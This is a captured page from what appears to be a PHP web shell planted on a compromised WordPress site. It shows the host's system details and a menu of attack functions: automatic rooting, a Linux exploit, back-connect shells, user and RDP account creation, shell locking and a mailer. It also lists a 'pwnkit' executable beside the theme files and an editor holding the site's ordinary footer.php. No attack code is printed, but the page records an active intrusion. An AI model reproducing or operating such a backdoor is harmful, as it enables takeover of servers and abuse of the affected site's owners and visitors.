Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
formation /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.63
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
3.35
KB
-rw-r--r--
comments.php
3.15
KB
-rw-r--r--
content-aside.php
1.51
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
637
B
-rw-r--r--
content-single.php
2.28
KB
-rw-r--r--
content.php
2.58
KB
-rw-r--r--
custom-css.js
807
B
-rw-r--r--
footer.php
2.29
KB
-rw-r--r--
functions.php
18.99
KB
-rw-r--r--
functionsbak.php
18.5
KB
-rw-r--r--
header.php
4.17
KB
-rw-r--r--
image.php
5.36
KB
-rw-r--r--
index.php
1.91
KB
-rw-r--r--
license.txt
14.96
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.15
KB
-rw-r--r--
page.php
1.03
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
1.69
KB
-rw-r--r--
rtl.css
47.04
KB
-rw-r--r--
screenshot.png
777.66
KB
-rw-r--r--
search.php
1.11
KB
-rw-r--r--
searchform.php
637
B
-rw-r--r--
sidebar.php
1.08
KB
-rw-r--r--
single.php
1.04
KB
-rw-r--r--
style.css
47.04
KB
-rw-r--r--
wpml-config.xml
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php /** * The template for displaying the footer. * * Contains the closing of the id=main div and all content after * * @package formation * @since formation 1.0 */ ?> </div><!-- #main .site-main --> <footer id="colophon" class="site-footer" role="contentinfo"> <?php if(! get_theme_mod('hide_footer_widgets')): ?> <div class="footer_container"> <div class="section group"> <div class="col span_1_of_3"> <?php if ( is_active_sidebar( 'left_column' ) && dynamic_sidebar('left_column') ) : else : ?> <div class="widget"> </div> <?php endif; ?> </div> <div class="col span_1_of_3"> <?php if ( is_active_sidebar( 'center_column' ) && dynamic_sidebar('center_column') ) : else : ?> <div class="widget"> </div> <?php endif; ?> </div> <div class="col span_1_of_3"> <?php if ( is_active_sidebar( 'right_column' ) && dynamic_sidebar('right_column') ) : else : ?> <div class="widget"> </div> <?php endif; ?> </div> </div> </div><!-- footer container --> <?php endif; ?> <?php if(! get_theme_mod('hide_copyright')): ?> <div class="site-info"> <?php if(get_theme_mod('copyright_text')): $allowedTags = array( 'a' => array( 'href' => array(), 'title' => array() ), 'em' => array(), 'strong' => array(), ); $copyright = wp_kses(get_theme_mod('copyright_text'), $allowedTags); ?> <?php echo $copyright; ?> <?php else: ?> <a href="<?php $my_theme = wp_get_theme(); echo $my_theme->get( 'ThemeURI' ); ?>"> <?php _e('Formation WordPress Theme','formation'); ?></a> <?php echo __( 'Powered By WordPress ', 'formation' ); ?> <?php endif; ?> </div><!-- .site-info --> <?php endif; ?> </footer><!-- #colophon .site-footer --> <a href="#top" id="smoothup"></a> </div><!-- #page .hfeed .site --> </div><!-- end of wrapper --> <?php wp_footer(); ?> </body> </html>
Close